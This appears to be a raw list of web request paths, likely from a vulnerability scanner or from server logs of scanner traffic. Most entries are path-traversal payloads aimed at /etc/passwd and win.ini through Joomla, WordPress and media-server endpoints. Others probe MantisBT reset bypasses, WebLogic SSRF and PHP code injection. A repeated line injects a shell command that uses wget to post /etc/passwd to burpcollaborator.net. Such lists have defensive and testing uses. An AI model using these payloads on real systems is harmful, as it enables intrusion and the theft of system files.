/web/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00
/web/device.rsp?opt=user&cmd=list
/web/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00
/web/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd
/web/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd
/web/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
/web/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00
/web/wp-content/plugins/jh-404-logger/readme.txt
/web/wp-json/buddypress/v1/signup
\..\..\..\..\Windows\win.ini
/web/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd
/web/ghost/preview
/web/auth/requestreset
/web/ReportServer/Pages/ReportViewer.aspx
/web/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
/web/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00
/web/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd
/web/tests/support/stores/test_grid_filter.php?query=phpinfo();
/web/verify.php?id=1&confirm_hash=
/web/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448
/web/api/snapshots
/web/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd
/web/pandora_console/attachment/pandora_chat.log.json.txt
/web/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
/web/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00
/web/javax.faces.resource/dynamiccontent.properties.xhtml
/web/ReportServer/Pages/ReportViewer.aspx
/web/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
/web/ghost/preview
/web/auth/requestreset
/web/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00
/web/api/snapshots
/web/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00
/web/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
/web/LetsEncrypt/Index?fileName=/etc/passwd
/web/verify.php?id=1&confirm_hash=
/web/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd
/web/javax.faces.resource/dynamiccontent.properties.xhtml
/web/pandora_console/attachment/pandora_chat.log.json.txt
/web/casa/nodes/thumbprints
/web/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20burpcollaborator.net)
/web/share/page/dologin
/web/LetsEncrypt/Index?fileName=/etc/passwd
/web/mantis/verify.php?id=1&confirm_hash=
/web/search/
/web/mailingupgrade.php
/web/casa/nodes/thumbprints
/web/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20burpcollaborator.net)
/web/share/page/dologin
/web/mantis/verify.php?id=1&confirm_hash=
/web/search/
/web/mailingupgrade.php
/web/mantisBT/verify.php?id=1&confirm_hash=
/web/mantisbt-2.3.0/verify.php?id=1&confirm_hash=
/web/bugs/verify.php?confirm_hash=&id=1
/web/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://
/web/lumis/portal/controller/xml/PageControllerXml.jsp
/web/carbon/generic/save_artifact_ajaxprocessor.jsp
